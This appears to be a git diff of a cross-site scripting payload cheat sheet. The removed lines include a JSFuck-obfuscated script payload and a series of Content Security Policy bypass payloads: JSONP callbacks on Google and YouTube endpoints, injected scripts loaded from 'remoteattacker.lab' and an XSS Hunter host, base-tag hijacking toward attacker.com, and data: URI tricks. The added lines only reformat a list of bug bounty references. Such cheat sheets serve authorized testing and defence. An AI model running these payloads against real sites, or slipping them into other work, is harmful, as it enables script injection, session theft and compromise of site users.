+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> -``` - -### Bypass using jsfuck - -Bypass using [jsfuck](http://www.jsfuck.com/) - -```javascript -[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() -``` - -## CSP Bypass - -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) - - -### Bypass CSP using JSONP - -**Requirements**: - -* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';` - -**Payload**: - -Use a callback function from a whitelisted source listed in the CSP. - -* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);` -* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)` -* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();` -* Youtube: `https://www.youtube.com/oembed?callback=alert;` -* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt) -* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) - -```js -<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" -``` - - -### Bypass CSP default-src - -**Requirements**: - -* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, - -**Payload**: - -`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;` - -```js -script=document.createElement('script'); -script.src='//remoteattacker.lab/csp.js'; -window.frames[0].document.head.appendChild(script); -``` - -Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa) - - -### Bypass CSP inline eval - -**Requirements**: - -* CSP `inline` or `eval` - - -**Payload**: - -```js -d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) -``` - -Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) - - -### Bypass CSP script-src self - -**Requirements**: - -* CSP like `script-src self` - -**Payload**: - -```js -<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> -``` - -Source: [@akita_zen](https://twitter.com/akita_zen) - - -### Bypass CSP script-src data - -**Requirements**: - -* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src). - - -**Payload**: - -```javascript -<script src="data:,alert(1)">/</script> -``` - -Source: [@404death](https://twitter.com/404death/status/1191222237782659072) - - -### Bypass CSP unsafe-inline - -**Requirements**: - -* CSP: `script-src https://google.com 'unsafe-inline';` - -**Payload**: - -```javascript -"/><script>alert(1);</script> -``` - - -### Bypass CSP nonce - -**Requirements**: - -* CSP like `script-src 'nonce-RANDOM_NONCE'` -* Imported JS file with a relative link: `<script src='/PATH.js'></script>` - - -**Payload**: - -1. Inject a base tag. - ```html - <base href=http://www.attacker.com> - ``` -2. Host your custom js file at the same path that one of the website's script. - ``` - http://www.attacker.com/PATH.js - ``` - - -### Bypass CSP header sent by PHP - -**Requirements**: - -* CSP sent by PHP `header()` function - - -**Payload**: - -In default `php:apache` image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine. - -Here are several ways to generate a warning: - -- 1000 $_GET parameters -- 1000 $_POST parameters -- 20 $_FILES - -If the **Warning** are configured to be displayed you should get these: - -* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0` -* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2` - - -```ps1 -GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a -``` - -Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) - ## Labs @@ -1369,62 +560,41 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) ## References -- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) -- [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass) -- [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html) -- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html) -- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://www.buaq.net/go-25883.html) -- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309) -- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) -- [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach -- [RPO that lead to information leakage in Google](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) by filedescriptor -- [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton -- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager -- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen -- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton -- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton -- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes -- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek -- [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S -- [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO -- [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) -- [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy -- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa -- [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen -- [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz -- [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify -- [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) -- [Microsoft XSS and Twitter XSS](https://wesecureapp.com/blog/xss-by-tossing-cookies/) -- [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans -- [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) -- [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) -- [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) -- [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) -- [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy -- [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard -- [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard -- [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) -- [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy -- [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) -- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow -- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett -- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) -- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) -- [postMessage XSS Bypass](https://hackerone.com/reports/231053) -- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin -- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans -- [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) -- [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen -- [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) -- [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov -- [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) -- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) -- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) -- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) -- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) -- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) -- [Bypass < with <](https://hackerone.com/reports/639684) -- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) -- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM) -- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/) \ No newline at end of file +- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) - Masato Kinugawa's (@kinugawamasato) - July 15, 2016](http://mksben.l0.cm/2016/07/xxn-caret.html) +- [Account Recovery XSS - Gábor Molnár - April 13, 2016](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) +- [An XSS on Facebook via PNGs & Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) +- [Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) +- [Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) +- [Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) +- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/) +- [Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) +- [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) +- [Google XSS Turkey - Frans Rosén - June 6, 2015](https://labs.detectify.com/2015/06/06/google-xss-turkey/) +- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) +- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) +- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://cure53.de/fp170.pdf) +- [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) +- [RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) +- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024](https://youtu.be/Sm4G6cAHjWM) +- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017](https://hackerone.com/reports/207042) +- [Stored XSS affecting all fantasy sports [*.fantasysports.yahoo.com] - thedawgyg - December 7, 2016](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) +- [Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) +- [Stored XSS In Facebook Chat, Check In, Facebook Messenger - Nirgoldshlager - April 17, 2013](http://web.archive.org/web/20130420095223/http://www.breaksec.com/?p=6129) +- [Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016](https://hackerone.com/reports/152067) +- [Stored XSS on Snapchat - Mrityunjoy - February 9, 2018](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) +- [Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) +- [Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016](https://hackerone.com/reports/150179) +- [Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017](https://hackerone.com/reports/260744) +- [Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) +- [Uber Self XSS to Global XSS - httpsonly - August 29, 2016](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) +- [Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) +- [Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016](http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) +- [Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309) +- [XSS by Tossing Cookies - WeSecureApp - July 10, 2017](https://wesecureapp.com/blog/xss-by-tossing-cookies/) +- [XSS ghettoBypass - d3adend - September 25, 2015](http://d3adend.org/xss/ghettoBypass) +- [XSS in Uber via Cookie - zhchbin - August 30, 2017](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) +- [XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017](https://hackerone.com/reports/231053) +- [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) +- [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html) +- [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html) +- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html) \ No newline at end of file